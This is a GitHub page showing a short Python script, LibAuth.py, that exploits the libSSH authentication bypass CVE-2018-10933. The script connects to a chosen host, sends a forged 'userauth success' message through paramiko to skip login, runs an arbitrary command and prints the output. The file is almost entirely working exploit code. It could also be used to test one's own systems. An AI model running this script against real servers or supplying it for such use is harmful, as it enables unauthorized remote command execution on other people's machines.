-
Notifications
You must be signed in to change notification settings - Fork 2
/
LibAuth.py
36 lines (31 loc) · 967 Bytes
/
LibAuth.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python3
import time
import paramiko
import socket
import sys
import argparse
parser = argparse.ArgumentParser(description="LibSSH Authentication Bypass CVE-2018-10933")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-c', '--command', help='Command')
args = parser.parse_args()
sock = socket.socket()
try:
host = args.host;
port = args.port
command = args.command;
sock.connect((host,int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
cmd = transport.open_session()
cmd.exec_command(command)
out=cmd.makefile("rb",222048)
output=out.read()
out.close()
print (output)
except socket.error:
print("Couldn't Connect to the Server")
sys.exit(1)